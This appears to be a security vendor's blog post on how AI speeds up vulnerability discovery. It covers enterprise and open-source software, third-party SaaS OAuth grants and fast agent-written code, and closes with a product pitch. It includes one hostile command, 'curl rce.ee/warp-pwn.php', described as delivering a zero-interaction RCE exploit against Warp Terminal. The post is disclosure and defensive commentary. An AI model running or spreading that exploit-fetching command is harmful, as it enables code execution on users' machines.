In last two months Vercel and Github both announced a security breach and I believe we’re going to see a lot more of this (unfortunately).
Just months after this tweet, it was followed by critical CVEs from vendors like F5, Fortinet, Cisco, Palo Alto, OSS projects, etc. Our 2-person team alone, with the help of Hacktron and Claude, has uncovered numerous critical issues which we will be disclosing in the coming days and weeks.
This is all fun until you reflect and realize the sheer speed at which vulnerabilities are getting found, you realize that there are state-sponsored threat actors in their prime time right now, fully resourced, finding 0-days with AI, planning the next big breach and it can be anyone or any org, quite literally.
One of the big limitations in security has always been talent and their niche. This is no longer true. I truly believe anyone with a somewhat good understanding of threat modeling software, asking the right questions, and patience can now hack! And the attack surfaces are only getting broader.
From a security point of view, the major implications I see are:
- OSS / Enterprise Software
- New SaaS products
- Shipping fast
Let me try to briefly explain all three areas of concern and potential solutions. All three have the potential to cause a company-wide security incident.
OSS / Enterprise Software
A few years back, if you’d told me F5, Fortinet, Cisco, Palo Alto, and ImageMagick would all get popped in one month, I probably would’ve been very skeptical. Today, if someone tells me they got 2-3 crazy 0days in OSS / enterprise software this week, I’d believe it.
So what changed? AI is accelerating vuln research. You can now understand the architecture of an app, read code faster, and reverse binaries at insane speed.
When you give those powers to a team of threat actors, they’re going after widely used appliances and software like SSL VPNs, firewalls, and remote appliances to compromise your infrastructure. Or they go after your employees by targeting client software like Slack, Discord, Teams, Zoom. I have already shown how easy it is to hack enterprise softwares now look at: BeyondTrust blog, Palo Alto blog.
I was doing some cleanup of our Google Workspace recently and noticed an email client being used by one of my colleagues. Since this opened up a new attack surface for us, I asked him why he preferred the email client over Gmail web. The reason was simple: convenience.
A few moments later
The convenience vs security trade-off here is big. After about 2 hours of poking around with Claude, we had two findings on this email client:
- One malicious email on the Windows client can do potential RCE
- On the Mac client, an email can potentially steal emails etc.
From a developer pov; IDEs, Terminal, Agentic flows will soon convert to attack surfaces. As we saw in case of Github hack, which was due to an IDE extension.
Take the example of Warp Terminal, a just recently open sourced agentic terminal, a few of my colleagues used it , so we ran Hacktron scan on its open source code and were able to find an RCE.
A chained exploit, gives an attacker code execution on any machine running Warp with zero user interaction. The victim only has to let attacker-controlled bytes reach their terminal (e.g. curl rce.ee/warp-pwn.php, a poisoned log line, cating a file). There are two independent paths to RCE, so the attack works whether or not Warp’s AI features are enabled.
For curious technical readers, it would be a good exercise to checkout to the April Warp git and use the available exploit link to find how the exploit works: rce.ee/warp-pwn.php.
Everyone’s POC’ing the new SaaS
People have always tried new apps coming in their feed or from their peers. However, in this age a vibe-coded product is launching every day, some of the same types, some different. Not merely DevOps tools, but also products related to CRM, DevOps, and others.
Picture a vibe-coded SaaS getting tried by lots of developers, with the SaaS taking elevated permissions to Google Workspace, cloud infra, or GitHub repos. They probably won’t even use this SaaS again and never revoke the grant. This creates another entry point into your org.
From Guillermo’s tweet regarding the Vercel breach: a Vercel employee got compromised through the breach of an AI platform called Context.ai. From there, the attacker got into Vercel environments.
Vercel might have vulnerabilities in their product. Every product does. But that’s not what got them. What got them was a developer connecting to a third-party AI SaaS that got pwned.
My guess is that Context.ai had escalated OAuth permissions on that dev’s account, which means whoever landed on Context.ai’s side inherited the same perms the dev had across Vercel’s customer environments. That’s the footgun.
Teams are shipping fast
Agents are writing code and humans are reviewing less of it. Finding vulnerabilities in shift-left was already a hard task; previous tools have not worked, have always created noise, and have often let vulnerabilities slip to prod, only to be caught later via other means.
This is even more prone to happen now given how fast the codebases are growing. In the time you review and understand one feature, 3 more are ready, and you just don’t have the team and cognitive load to review tens of thousands of lines of code to find that one nasty bug.
Another thing about vulnerabilities is that they are not necessarily bound to happen in the changed code, but can happen in an entirely different area of the codebase or another codebase, just because one function’s signature changes a default from false to true.
On the other hand, business-wise, it is necessary for teams to ship fast; otherwise, competitors are going to get ahead.
Even at Hacktron, when a client asks for a feature we try our best to ship it asap, and that means sometimes agents are gonna slip in vulnerabilities.
Real-time PR review is how we catch these at Hacktron with our code review solution.
How can you position yourself better?
If you ask me, there’s one rule you should try to practice: assume breach.
Assume the sandbox where you’re executing commands is going to get breached, so build a better sandbox. Assume the user will escape the sandbox, so the outer infra should adopt roles and network rules with that threat model in mind.
The same logic applies to third parties. Assume the SaaS you’re giving access to is going to get breached. Would you still give them Gmail read access? Assume your Slack workspace or your local machine is going to get hacked. Would you still have production keys sitting in chat?
If you’re a security team sitting between fast-shipping product teams and production, this is the problem we built Hacktron Review to solve. Start a trial.